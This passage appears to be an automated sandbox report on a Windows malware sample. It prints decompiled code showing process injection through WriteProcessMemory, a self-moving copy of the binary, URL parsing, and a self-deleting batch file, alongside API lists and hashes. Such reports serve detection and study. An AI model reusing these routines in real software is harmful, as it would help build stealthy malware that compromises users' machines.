							_t172 = E00417116( &_v24,  &_v272,  *((intOrPtr*)(_a4 + 0x2c)));
							_t247 = _t247 + 0x10;
							L55:
							if(_t172 > _t217) {
								_t174 = E00417757(_v24, _t172 + _t172);
								if( *0x4230bc != _t174) {
									_t64 =  &_v16;
									 *_t64 = _v16 | 0x00000020;
									__eflags =  *_t64;
									 *0x4230bc = _t174;
								} else {
									E004163A8(_v24);
									_v24 = _t217;
								}
							}
							_t240 = _a4;
							L60:
							if(_v9 != 0xff) {
								__eflags = _v9 - 1;
								if(_v9 != 1) {
									L67:
									if((_v16 & 0x00000008) == 0) {
										L93:
										E004163A8(_v24);
										_t218 = _v16;
										if((_t218 & 0x00000001) == 0) {
											if(E004143EC(_t230, _t240) != 0) {
												_t218 = _t218 | 0x00000002;
											}
											if((_t218 & 0x00000010) != 0 && E004147A6(_t240, _t230) != 0) {
												_t218 = _t218 | 0x00000004;
											}
										}
										return _t218;
									}
									_t136 =  *(_t240 + 0x28);
									_t219 = 0;
									if( *(_t240 + 0x28) != 0) {
										__eflags = _v16 & 0x00000010;
										if((_v16 & 0x00000010) == 0) {
											__eflags =  *(_t240 + 0x20);
											if( *(_t240 + 0x20) != 0) {
												L92:
												_v16 = _v16 & 0xfffffff7;
												goto L93;
											}
											_t233 =  &_v36;
											_t137 = 0xc;
											E0040F9FD(_t137, _t233);
											_push(_t233);
											_push(9);
											L81:
											_pop(_t140);
											_v20 = E00416806(_t140);
											L82:
											if(_v20 == 0) {
												goto L92;
											}
											E00405CFE( &_v32);
											_t144 = E004165E8( *(_t240 + 0xc), 0,  *(_t240 + 8));
											_t235 = _t144;
											if(_t144 != 0) {
												_t230 = 0x3c;
												E0041645B( &_v160,  &_v160, 0, _t230);
												_v160 = _t230;
												if(InternetCrackUrlA( *(_t240 + 8),  *(_t240 + 0xc), 0,  &_v160) == 1) {
													_t152 = 0xa;
													E0040FA33(_t152,  &_v272);
													_t154 = 0xd;
													E0040FA33(_t154,  &_v60);
													_t227 =  *(_a4 + 0x10);
													_t156 = 0x403240;
													_t230 =  ==  ? 0x403240 : _v24;
													_t244 =  ==  ? 0x403240 : _v32;
													if(_t227 == 0) {
														_t227 = "-";
													}
													if((_v16 & 0x00000001) != 0) {
														_t156 =  &_v60;
													}
													_push(_v20);
													_push(_t230);
													_push(_t244);
													_push(_t227);
													_push(_t156);
													_t161 = E0040592A(_t227, _t230, (0 | _v148 == 0x00000004) + 0xb, (0 | _v148 == 0x00000004) + 0xb, _t235, 0,  &_v272, _t235);
													_t240 = _a4;
													_t219 = _t161;
												}
												E004163A8(_t235);
											}
											E004163A8(_v32);
											E004163A8(_v20);
											if(_t219 != 0) {
												goto L93;
											} else {
												goto L92;
											}
										}
										_t230 = E00416806(_t136,  *((intOrPtr*)(_t240 + 0x24)));
										_v20 = _t230;
										__eflags = _t230;
										if(_t230 == 0) {
											goto L92;
										}
										_t163 = 0;
										__eflags =  *(_t240 + 0x28);
										if( *(_t240 + 0x28) <= 0) {
											goto L82;
										} else {
											goto L73;
										}
										do {
											L73:
											_t228 =  *((intOrPtr*)(_t163 + _t230));
											__eflags = _t228 - 0x26;
											if(_t228 != 0x26) {
												__eflags = _t228 - 0x2b;
												if(_t228 == 0x2b) {
													 *((char*)(_t163 + _t230)) = 0x20;
												}
											} else {
												 *((char*)(_t163 + _t230)) = 0xa;
											}
											_t163 = _t163 + 1;
											__eflags = _t163 -  *(_t240 + 0x28);
										} while (_t163 <  *(_t240 + 0x28));
										goto L82;
									}
									_t236 =  &_v36;
									_t164 = 0xb;
									E0040F9FD(_t164, _t236);
									_push(_t236);
									_push(7);
									goto L81;
								}
								L66:
								_v16 = _v16 | 0x00000008;
								goto L67;
							}
							if( *((char*)(_t240 + 0x18)) != 1 ||  *(_t240 + 0x28) <= _t217) {
								if((_v16 & 0x00000020) == 0) {
									goto L67;
								}
							}
							goto L66;
						}
					}
				}
				_t189 = E0041BF16( &_v32, _t230, _t254, _t128, 0x4e25, 0x10000000);
				_t225 = _v32;
				_v20 = _t189;
				if(E0041723A(_t189, _v32) == 0) {
					L37:
					E004163A8(_v20);
					_t217 = 0;
					goto L38;
				} else {
					_t239 = _v20;
					do {
						_t225 = _t239 + 1;
						if( *_t225 == 0) {
							goto L36;
						}
						_t194 =  *_t239;
						if(_t194 == 0x21) {
							L22:
							_t239 = _t225;
							L23:
							_t230 = 0;
							_t225 = _t239;
							if(E004140C9(_t239, 0,  *(_t240 + 8),  *(_t240 + 0xc)) == 0) {
								goto L36;
							}
							_t197 = _t224;
							if(_t197 == 0) {
								_v9 = 0;
								L35:
								if(_t224 != 2) {
									goto L37;
								}
								goto L36;
							}
							_t198 = _t197 - 1;
							if(_t198 == 0) {
								L30:
								_v9 = 1;
								goto L35;
							}
							_t199 = _t198 - 1;
							if(_t199 == 0) {
								_t230 = 0x3c;
								E0041645B( &_v96,  &_v96, 0, 0);
								_v80 =  &_v536;
								_v96 = 0;
								_v76 = 0x103;
								_t204 = InternetCrackUrlA( *(_t240 + 8),  *(_t240 + 0xc), 0,  &_v96);
								__eflags = _t204 - 1;
								if(_t204 == 1) {
									__eflags = _v76;
									if(_v76 > 0) {
										E00405CB8( &_v536);
									}
								}
								goto L35;
							}
							_t207 = _t199 - 1;
							if(_t207 == 0 || _t207 == 1) {
								_v16 = _v16 | 0x00000001;
								goto L30;
							} else {
								goto L35;
							}
						}
						if(_t194 == 0x2d) {
							goto L22;
						}
						if(_t194 == 0x40) {
							goto L22;
						}
						if(_t194 == 0x5e) {
							_t224 = 4;
							goto L22;
						} else {
							_t224 = 0;
							goto L23;
						}
						L36:
						_t239 = E00417278(_t239, 1);
					} while (_t239 != 0);
					goto L37;
				}
			}

0x004149a5
0x004149a8
0x004149ab
0x004149af
0x004149b5
0x004149bd
0x00414a2e
0x004149c7
0x004149c7
0x004149cd
0x004149d9
0x004149db
0x004149e0
0x004149e5
0x004149f3
0x004149f8
0x004149fd
0x004149ff
0x00414a04
0x00414a05
0x00414a05
0x00414a10
0x00414a1b
0x00414a20
0x00414a26
0x00414a26
0x004149d9
0x00414a32
0x00414a38
0x00414a3b
0x00414a3d
0x00414b42
0x00414b46
0x00414b48
0x00414b4b
0x00414b4d
0x00414b62
0x00414b62
0x00414b4d
0x00414b6a
0x00414b71
0x00414b72
0x00414b77
0x00414b88
0x00414b8a
0x00414b8f
0x00414b95
0x00414b95
0x00414b8f
0x00414b88
0x00414b99
0x00414b9c
0x00414ba1
0x00414bdc
0x00414bdc
0x00414bdf
0x00414be1
0x00000000
0x00000000
0x00414be3
0x00414be6
0x00000000
0x00000000
0x00414bf0
0x00414bf1
0x00414c03
0x00414c08
0x00000000
0x00414ba8
0x00414ba8
0x00414bad
0x00000000
0x00414bb4
0x00414bbc
0x00414bbd
0x00414bc5
0x00414bd2
0x00414bd7
0x00414c0b
0x00414c0d
0x00414c15
0x00414c20
0x00414c2f
0x00414c2f
0x00414c2f
0x00414c33
0x00414c22
0x00414c25
0x00414c2a
0x00414c2a
0x00414c20
0x00414c38
0x00414c3b
0x00414c3f
0x00414c54
0x00414c58
0x00414c5e
0x00414c62
0x00414dd5
0x00414dd8
0x00414ddd
0x00414de3
0x00414ded
0x00414def
0x00414def
0x00414df5
0x00414e02
0x00414e02
0x00414df5
0x00414e0b
0x00414e0b
0x00414c68
0x00414c6b
0x00414c6f
0x00414c83
0x00414c87
0x00414cc4
0x00414cc8
0x00414dd1
0x00414dd1
0x00000000
0x00414dd1
0x00414cd0
0x00414cd3
0x00414cd4
0x00414cdb
0x00414cdc
0x00414cde
0x00414cde
0x00414ce4
0x00414ce7
0x00414ceb
0x00000000
0x00000000
0x00414cf4
0x00414d01
0x00414d06
0x00414d0a
0x00414d12
0x00414d1d
0x00414d2e
0x00414d40
0x00414d4a
0x00414d4b
0x00414d55
0x00414d56
0x00414d64
0x00414d69
0x00414d6e
0x00414d73
0x00414d78
0x00414d7a
0x00414d7a
0x00414d83
0x00414d85
0x00414d85
0x00414d88
0x00414d8b
0x00414d8c
0x00414d8d
0x00414d8e
0x00414daa
0x00414daf
0x00414db5
0x00414db5
0x00414db8
0x00414db8
0x00414dc0
0x00414dc8
0x00414dcf
0x00000000
0x00000000
0x00000000
0x00000000
0x00414dcf
0x00414c91
0x00414c93
0x00414c96
0x00414c98
0x00000000
0x00000000
0x00414c9e
0x00414ca0
0x00414ca3
0x00000000
0x00000000
0x00000000
0x00000000
0x00414ca5
0x00414ca5
0x00414ca5
0x00414ca8
0x00414cab
0x00414cb3
0x00414cb6
0x00414cb8
0x00414cb8
0x00414cad
0x00414cad
0x00414cad
0x00414cbc
0x00414cbd
0x00414cbd
0x00000000
0x00414cc2
0x00414c73
0x00414c76
0x00414c77
0x00414c7e
0x00414c7f
0x00000000
0x00414c7f
0x00414c5a
0x00414c5a
0x00000000
0x00414c5a
0x00414c45
0x00414c50
0x00000000
0x00000000
0x00414c52
0x00000000
0x00414c45
0x00414bad
0x00414ba1
0x00414a51
0x00414a56
0x00414a59
0x00414a63
0x00414b38
0x00414b3b
0x00414b40
0x00000000
0x00414a69
0x00414a69
0x00414a6c
0x00414a6c
0x00414a72
0x00000000
0x00000000
0x00414a78
0x00414a7c
0x00414a9c
0x00414a9c
0x00414a9e
0x00414aa1
0x00414aa6
0x00414aaf
0x00000000
0x00000000
0x00414ab4
0x00414ab7
0x00414b1c
0x00414b20
0x00414b23
0x00000000
0x00000000
0x00000000
0x00414b23
0x00414ab9
0x00414aba
0x00414ac9
0x00414ac9
0x00000000
0x00414ac9
0x00414abc
0x00414abd
0x00414ad1
0x00414ad9
0x00414ae4
0x00414af0
0x00414af6
0x00414afd
0x00414b03
0x00414b06
0x00414b08
0x00414b0c
0x00414b15
0x00414b15
0x00414b0c
0x00000000
0x00414b06
0x00414abf
0x00414ac0
0x00414ac5
0x00000000
0x00000000
0x00000000
0x00000000
0x00414ac0
0x00414a80
0x00000000
0x00414a96
0x00414a84
0x00000000
0x00414a92
0x00414a88
0x00414a8e
0x00000000
0x00414a8a
0x00414a8a
0x00000000
0x00414a8a
0x00414b25
0x00414b2e
0x00414b30
0x00000000
0x00414a6c

APIs

EnterCriticalSection.KERNEL32(00423124,?,?,?), ref: 004149AF
LeaveCriticalSection.KERNEL32(00423124,?,?,?), ref: 00414A32
InternetCrackUrlA.WININET(?,?,00000000,?), ref: 00414AFD
InternetCrackUrlA.WININET(?,?,00000000,?), ref: 00414D37

Part of subcall function 00405AEB: CreateMutexW.KERNEL32(00422BD0,00000000,00422838,00423124,000000FF,?,004149E0,?,?,?,?,?), ref: 00405B13

Part of subcall function 004163A8: HeapFree.KERNEL32(00000000,00000000,00417B9F,00000000,?,?,?,0040E6CA,00000000,0040EBA4), ref: 004163BB

Strings

$1B, xrefs: 004149A0
, xrefs: 00414C4C

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: CrackCriticalInternetSection$CreateEnterFreeHeapLeaveMutex
String ID: $$1B
API String ID: 4018265435-1232611650
Opcode ID: 47f2ec4dff7a6501bf300a645975428061cf95cea47dde01b357e172c23a3690
Instruction ID: 4fa88fcf790a8b0c1230a9e793b23cdca11eeef32dab8c0a9c75a7df79a22d0e
Opcode Fuzzy Hash: 47f2ec4dff7a6501bf300a645975428061cf95cea47dde01b357e172c23a3690
Instruction Fuzzy Hash: 76D1E031A00209AEDF209FA1C841BEFBBB5AF85304F05446BE951A7291D77CE9C2CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00405282, Relevance: 10.7, APIs: 7, Instructions: 216
filestringCOMMON

Download Yara Rule

C-Code - Quality: 99%

			E00405282(WCHAR* __ecx, signed char* _a4) {
				char _v268;
				char _v691;
				signed short _v792;
				signed short _v864;
				char _v1060;
				short _v1580;
				short _v1584;
				intOrPtr _v1588;
				signed char* _v1592;
				signed int _v1596;
				char* _v1600;
				void* _v1604;
				intOrPtr _v1608;
				intOrPtr _v1612;
				char _v1616;
				intOrPtr _v1620;
				signed int _v1624;
				signed int _v1628;
				void* _v1629;
				signed int _v1632;
				void* __ebx;
				void* __esi;
				signed int _t60;
				signed int _t69;
				signed int _t71;
				signed int _t72;
				signed int _t80;
				signed int _t83;
				long _t84;
				long _t85;
				signed int _t89;
				signed int _t101;
				signed int _t108;
				signed int _t110;
				WCHAR* _t123;
				signed char _t125;
				signed char* _t131;
				signed int _t134;
				void* _t136;
				void* _t140;
				signed int _t141;

				_t128 = __ecx;
				_t131 = _a4;
				_t60 = E0040EDBB(__ecx,  *_t131, (0 |  *_t131 != 0x00000000) + 0x78d0c214, 2);
				_v1628 = _t60;
				if(_t60 != 0) {
					_v1604 =  *0x42305c;
					_v1600 =  &_v268;
					_v1612 = E004050DE;
					_v1608 = E0040521A;
					_v1592 = _t131;
					E0040F05A( &_v1060);
					E004163E4( &_v268,  &_v691, 0x102);
					_t69 =  *_t131 & 0x000000ff;
					__eflags = _t69;
					if(_t69 == 0) {
						_t71 = _v792 >> 0x10;
						__eflags = _t71;
						_v1628 = _t71;
						_t72 = _v792 & 0x0000ffff;
						goto L7;
					} else {
						__eflags = _t69 == 1;
						if(_t69 == 1) {
							_v1628 = _v864 >> 0x10;
							_t72 = _v864 & 0x0000ffff;
							L7:
							_v1624 = _t72;
						}
					}
					_v1628 = _v1628 * 0xea60;
					_v1624 = _v1624 * 0xea60;
					E0041645B( &_v1060,  &_v1060, 0, 0x318);
					_v1592 = 0;
					_t80 = E0040EEE1();
					__eflags = _t80;
					if(_t80 != 0) {
						do {
							__eflags =  *_t131;
							_v1629 = 1;
							if( *_t131 != 0) {
								L24:
								_t83 = E00415F3A();
								_t138 = _t83;
								__eflags = _t83;
								if(__eflags == 0) {
									goto L29;
								} else {
									_v1628 = E0041BF16(0, _t129, __eflags, _t138, 0x4e23, 0x10000000);
									E004163A8(_t138);
									__eflags = _v1632;
									if(_v1632 == 0) {
										_t131 = _a4;
										goto L33;
									} else {
										_v1596 = _v1596 & 0;
										_t108 = E00404EA2(_t128, _t129,  &_v1596, 1);
										_t131 = _a4;
										__eflags = _t108;
										if(_t108 == 0) {
											L33:
											_t125 = _v1629;
										} else {
											_t131[8] = _t131[8] | 0xffffffff;
											_t110 = E0040569F( &_v1616);
											__eflags = _t110;
											_t125 = (0 | _t110 != 0x00000000) - 0x00000001 & 0x00000002;
											E0041C343( &(_t131[8]));
											E004163A8(_v1596);
										}
									}
									E004163A8(_v1616);
									__eflags = _t125 - 2;
									if(_t125 != 2) {
										__eflags = _t125;
										if(_t125 != 0) {
											goto L29;
										} else {
											_t84 = _v1628;
										}
									} else {
										_t84 = _v1624;
									}
								}
							} else {
								asm("sbb ebx, ebx");
								E00404D61( !( ~(_v1580 & 0x0000ffff)) &  &_v1580, _t128, 0);
								_t123 =  &(_t131[0x122]);
								_t89 = GetFileAttributesW( &_v1584);
								__eflags = _t89 - 0xffffffff;
								if(_t89 == 0xffffffff) {
									_t89 = GetFileAttributesW(0x4223a8);
									__eflags = _t89 - 0xffffffff;
									if(_t89 == 0xffffffff) {
										goto L29;
									} else {
										_t128 = 0x4223a8;
										goto L14;
									}
								} else {
									_t128 =  &_v1580;
									L14:
									_t129 = _t123;
									E00416749(_t89 | 0xffffffff, _t128, _t129);
									_t140 = CreateFileW(_t123, 0x80000000, 7, 0, 3, 0, 0);
									__eflags = _t140 - 0xffffffff;
									if(_t140 == 0xffffffff) {
										L28:
										E0041B705(_t123);
										goto L29;
									} else {
										_v1592 = E0041B6DE(_t128, _t140);
										_t134 = _t129;
										CloseHandle(_t140);
										__eflags = _v1592 - 0xffffffff;
										if(_v1592 != 0xffffffff) {
											L17:
											__eflags = _t134;
											if(__eflags > 0) {
												goto L28;
											} else {
												if(__eflags < 0) {
													L20:
													__eflags = lstrcmpiW(_t123,  &_v1580);
													if(__eflags == 0) {
														goto L24;
													} else {
														_t141 = E0040EDBB(_t128, __eflags, 0x8793aef2, 2);
														__eflags = _t141;
														if(_t141 == 0) {
															L29:
															_t131 = _a4;
															_t84 = 0x7530;
														} else {
															_t101 = MoveFileExW(_t123,  &_v1580, 0xb);
															__eflags = _t101;
															if(_t101 == 0) {
																goto L29;
															} else {
																E00419B7B(_t141);
																__eflags = _t101 | 0xffffffff;
																_t128 =  &_v1584;
																_t129 = _t123;
																E00416749(_t101 | 0xffffffff,  &_v1584, _t123);
																goto L24;
															}
														}
													}
												} else {
													__eflags = _v1588 - 0xffffffff;
													if(_v1588 > 0xffffffff) {
														goto L28;
													} else {
														goto L20;
													}
												}
											}
										} else {
											__eflags = _t134;
											if(_t134 == 0) {
												goto L28;
											} else {
												goto L17;
											}
										}
									}
								}
							}
							_t85 = WaitForSingleObject( *0x42305c, _t84);
							__eflags = _t85 - 0x102;
						} while (_t85 == 0x102);
					}
					E00419B7B(_v1620);
					_t136 = 0;
				} else {
					_t136 = 1;
				}
				E004163A8(_t131);
				return _t136;
			}

0x00405282
0x00405291
0x004052a5
0x004052aa
0x004052b0
0x004052cb
0x004052d6
0x004052e1
0x004052e9
0x004052f1
0x004052f5
0x0040530f
0x00405317
0x00405317
0x00405319
0x0040533d
0x0040533d
0x00405340
0x00405344
0x00000000
0x0040531b
0x0040531b
0x0040531c
0x00405328
0x0040532c
0x0040534c
0x0040534c
0x0040534c
0x0040531c
0x0040535a
0x0040536d
0x0040537a
0x00405381
0x00405386
0x0040538b
0x0040538d
0x00405393
0x00405393
0x00405396
0x0040539b
0x0040549b
0x0040549b
0x004054a0
0x004054a2
0x004054a4
0x00000000
0x004054a6
0x004054b9
0x004054bd
0x004054c2
0x004054c6
0x0040553e
0x00000000
0x004054c8
0x004054c8
0x004054d3
0x004054d8
0x004054db
0x004054dd
0x00405541
0x00405541
0x004054df
0x004054e2
0x004054e9
0x004054ee
0x004054f5
0x004054f8
0x00405501
0x00405501
0x004054dd
0x00405549
0x0040554e
0x00405551
0x00405559
0x0040555b
0x00000000
0x0040555d
0x0040555d
0x0040555d
0x00405553
0x00405553
0x00405553
0x00405551
0x004053a1
0x004053a8
0x004053b4
0x004053c4
0x004053ca
0x004053cc
0x004053cf
0x004053dd
0x004053df
0x004053e2
0x00000000
0x004053e8
0x004053e8
0x00000000
0x004053e8
0x004053d1
0x004053d1
0x004053ea
0x004053ed
0x004053ef
0x00405409
0x0040540b
0x0040540e
0x00405508
0x00405509
0x00000000
0x00405414
0x0040541b
0x0040541f
0x00405421
0x00405427
0x0040542c
0x00405436
0x00405436
0x00405438
0x00000000
0x0040543e
0x0040543e
0x0040544b
0x00405457
0x00405459
0x00000000
0x0040545b
0x00405467
0x00405469
0x0040546b
0x0040550e
0x0040550e
0x00405511
0x00405471
0x00405479
0x0040547f
0x00405481
0x00000000
0x00405487
0x00405488
0x0040548d
0x00405490
0x00405494
0x00405496
0x00000000
0x00405496
0x00405481
0x0040546b
0x00405440
0x00405440
0x00405445
0x00000000
0x00000000
0x00000000
0x00000000
0x00405445
0x0040543e
0x0040542e
0x0040542e
0x00405430
0x00000000
0x00000000
0x00000000
0x00000000
0x00405430
0x0040542c
0x0040540e
0x004053cf
0x0040551d
0x00405523
0x00405523
0x00405393
0x00405532
0x00405537
0x004052b2
0x004052b4
0x004052b4
0x004052b6
0x004052c3

APIs

Part of subcall function 0040EDBB: CreateMutexW.KERNEL32(00422BD0,00000000,?,?,?,?,?), ref: 0040EDDC

GetFileAttributesW.KERNEL32(?,00000000,?,00000000,00000318,?,?,00000102), ref: 004053CA
CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00405403
CloseHandle.KERNEL32(00000000,00000000), ref: 00405421
lstrcmpiW.KERNEL32(?,?), ref: 00405451

Part of subcall function 004163A8: HeapFree.KERNEL32(00000000,00000000,00417B9F,00000000,?,?,?,0040E6CA,00000000,0040EBA4), ref: 004163BB

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: CreateFile$AttributesCloseFreeHandleHeapMutexlstrcmpi
String ID:
API String ID: 503543330-0
Opcode ID: a551fcf92da6eda0e03976b2a21ea83e966c07776e7b3f6c8d3ff0ee8b822606
Instruction ID: a93f248e11021d3eea97378de2ec924c89e2c0d3699c819ac599492a8fca6bad
Opcode Fuzzy Hash: a551fcf92da6eda0e03976b2a21ea83e966c07776e7b3f6c8d3ff0ee8b822606
Instruction Fuzzy Hash: C371BD31504741ABC720EF24CC81AABB7E9EF81324F140A3FF995E62D1D738D9458B9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040EDF6, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 87
injectionCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0040EDF6(void* __ecx, void* __edi, void* __esi, void* __eflags, void* _a4, void _a8) {
				char _v5;
				void _v12;
				intOrPtr _t25;
				void _t26;
				signed int _t29;
				void _t43;
				void* _t51;
				void* _t52;

				_t52 = __esi;
				_t51 = __edi;
				_t25 =  *0x422bac; // 0x400000
				_t26 = E0041AD03(_t25, __edi);
				_v12 = _t26;
				if(_t26 != 0) {
					_v5 = 0;
					if(DuplicateHandle(0xffffffff, _a4, __edi,  &_a4, 0, 0, 2) == 0) {
						_v5 = 1;
					}
					_t29 =  *0x422b98; // 0x1
					_a8 = _a8 | _t29 & 0x00000014;
					_push(_t52);
					if(WriteProcessMemory(_t51, 0x422b98 -  *0x422bac + _v12,  &_a8, 4, 0) == 0) {
						_v5 = _v5 + 1;
					}
					if(WriteProcessMemory(_t51, 0x422bac -  *0x422bac + _v12,  &_v12, 4, 0) == 0) {
						_v5 = _v5 + 1;
					}
					if(E0040E5D7(0x42305c, _t51, _v12,  *0x42305c) == 0) {
						_v5 = _v5 + 1;
					}
					if(E0040E5D7(0x423060, _t51, _v12,  *0x423060) == 0) {
						_v5 = _v5 + 1;
					}
					if(_v5 == 0) {
						_t43 = _v12;
					} else {
						VirtualFreeEx(_t51, _v12, 0, 0x8000);
						goto L1;
					}
				} else {
					L1:
					_t43 = 0;
				}
				return _t43;
			}

0x0040edf6
0x0040edf6
0x0040edfb
0x0040ee02
0x0040ee09
0x0040ee0e
0x0040ee23
0x0040ee30
0x0040ee32
0x0040ee32
0x0040ee36
0x0040ee3e
0x0040ee41
0x0040ee63
0x0040ee65
0x0040ee65
0x0040ee84
0x0040ee86
0x0040ee86
0x0040ee9f
0x0040eea1
0x0040eea1
0x0040eeba
0x0040eebc
0x0040eebc
0x0040eec2
0x0040eed9
0x0040eec4
0x0040eece
0x00000000
0x0040eece
0x0040ee10
0x0040ee10
0x0040ee10
0x0040ee10
0x0040eede

APIs

Part of subcall function 0041AD03: IsBadReadPtr.KERNEL32(00400000,?,00000000,?,00000000,?,00000000,?,74B5F560,00000000), ref: 0041AD1F

DuplicateHandle.KERNEL32(000000FF,74B5F560,00000000,74B5F560,00000000,00000000,00000002,00000000,00000000,?,?,?,00415A55,?,00000000,?), ref: 0040EE28
WriteProcessMemory.KERNEL32(00000000,74B5F560,?,00000004,00000000,?,?,?,?,00415A55,?,00000000,?,?,00415BE3,?), ref: 0040EE5F
WriteProcessMemory.KERNEL32(00000000,74B5F560,74B5F560,00000004,00000000,?,?,?,00415A55,?,00000000,?,?,00415BE3,?,?), ref: 0040EE7F
VirtualFreeEx.KERNEL32(00000000,74B5F560,00000000,00008000,00000000,74B5F560,00000000,74B5F560,?,?,00415A55,?,00000000,?,?,00415BE3), ref: 0040EECE

Strings

`0B, xrefs: 0040EEAA
\0B, xrefs: 0040EE8F

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: MemoryProcessWrite$DuplicateFreeHandleReadVirtual
String ID: \0B$`0B
API String ID: 2215616122-2135143743
Opcode ID: 8e7f3c0b844cbb3ee79bc72f6ee6713d0c131ed688861d5c25a01e13f1c3a75d
Instruction ID: 7dd66aab72cd2963f5657b2b1d80a40bfa13afb11ab977881fac23c46b1ac80a
Opcode Fuzzy Hash: 8e7f3c0b844cbb3ee79bc72f6ee6713d0c131ed688861d5c25a01e13f1c3a75d
Instruction Fuzzy Hash: 5A21D37260414DBEDF119FA5DD80EBF7F78EB09348F404476F600B2191D37A9A568B68

Uniqueness

Uniqueness Score: -1.00%

Function 00412969, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 85
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00412969(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
				void* _v8;
				long _v12;
				void* _v16;
				char _v32;
				void _v360;
				short _v880;
				void* __edi;
				void* __esi;
				void* _t18;
				void* _t25;
				void* _t26;
				long _t39;
				void* _t42;
				void* _t44;
				long _t47;

				_t48 =  &_v32;
				_t18 = 0x2b;
				_v16 = __edx;
				_t44 = __ecx;
				E0040FA33(_t18,  &_v32);
				if(E0041BC2F(_t48,  &_v880, _t44) == 0) {
					L11:
					return 1;
				}
				_t25 = CreateFileW( &_v880, 0x40000000, 1, 0, 2, 0x80, 0);
				_v8 = _t25;
				if(_t25 == 0xffffffff) {
					goto L11;
				}
				_t26 = 0x30;
				_t39 = 0;
				E0040F9FD(_t26,  &_v360);
				_t9 =  &_v8; // 0x412951
				if(WriteFile( *_t9,  &_v360, 0x146,  &_v12, 0) == 0 || _v12 != 0x146) {
					L9:
					FlushFileBuffers(_v8);
					CloseHandle(_v8);
					if(_t39 == 0) {
						E0041B705( &_v880);
					}
					goto L11;
				} else {
					_t42 = _v16;
					if(_t42 == 0) {
						L7:
						_t39 = 1;
						goto L9;
					}
					_t47 = E00416EE5(_t42);
					if(WriteFile(_v8, _t42, _t47,  &_v12, 0) == 0 || _v12 != _t47) {
						_t39 = 0;
						goto L9;
					} else {
						goto L7;
					}
				}
			}

0x00412976
0x00412979
0x0041297a
0x0041297d
0x0041297f
0x00412995
0x00412a4b
0x00412a4f
0x00412a4f
0x004129b4
0x004129ba
0x004129c0
0x00000000
0x00000000
0x004129cf
0x004129d0
0x004129d2
0x004129ef
0x004129f6
0x00412a27
0x00412a2a
0x00412a33
0x00412a3c
0x00412a45
0x00412a45
0x00000000
0x004129fd
0x004129fd
0x00412a02
0x00412a21
0x00412a21
0x00000000
0x00412a21
0x00412a0b
0x00412a1a
0x00412a25
0x00000000
0x00000000
0x00000000
0x00000000
0x00412a1a

APIs

Part of subcall function 0041BC2F: PathCombineW.SHLWAPI(0040E807,0040E807,?,0040E807,?,?), ref: 0041BC4E

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?,?,00000000), ref: 004129B4
WriteFile.KERNEL32(Q)A,?,00000146,?,00000000,00000000), ref: 004129F2
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00412A16
FlushFileBuffers.KERNEL32(?), ref: 00412A2A
CloseHandle.KERNEL32(?), ref: 00412A33

Strings

Q)A, xrefs: 004129EF

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: File$Write$BuffersCloseCombineCreateFlushHandlePath
String ID: Q)A
API String ID: 2459967240-3617747832
Opcode ID: ef876b2a069be169e90b6184df78c9ccb26ea1b7e5d1ffcbb19f52362c1ad6cc
Instruction ID: d1f190e6ca25707627269e5bd167f62add1a035dd1a15446e38472afb72ad185
Opcode Fuzzy Hash: ef876b2a069be169e90b6184df78c9ccb26ea1b7e5d1ffcbb19f52362c1ad6cc
Instruction Fuzzy Hash: D621BA32A10218BBCF21DBA1DE45FEF7BBCAF44390F1440A6A500F21A0D7799B85CA64

Uniqueness

Uniqueness Score: -1.00%

Function 00417E68, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00417E68(void* __ebx, void* __edi, char _a4) {
				short _v24;
				intOrPtr _v28;
				char _v72;
				short _v592;
				char _v852;
				char _v1392;
				void* _t35;
				char _t56;

				if(E0041B726(L"bat",  &_v592) == 0) {
					L7:
					return 0;
				}
				CharToOemW( &_v592,  &_v852);
				_push( &_v852);
				if(E0041716C( &_a4, "@echo off\r\n%s\r\ndel /F \"%s\"\r\n", _a4) == 0xffffffff) {
					L6:
					E0041B705( &_v592);
					goto L7;
				}
				_t35 = E0041B55A( &_v592, _a4, _t31);
				E004163A8(_a4);
				if(_t35 == 0) {
					goto L6;
				}
				_push(__edi);
				_push( &_v592);
				if(E0041709B( &_v592, 0x10e,  &_v1392,  &M00404934) <= 0xffffffff || GetEnvironmentVariableW(L"ComSpec",  &_v592, 0x104) - 1 > 0x102) {
					goto L6;
				} else {
					_t56 = 0x44;
					E0041645B( &_v72,  &_v72, 0, _t56);
					_v24 = 0;
					_v72 = _t56;
					_v28 = 1;
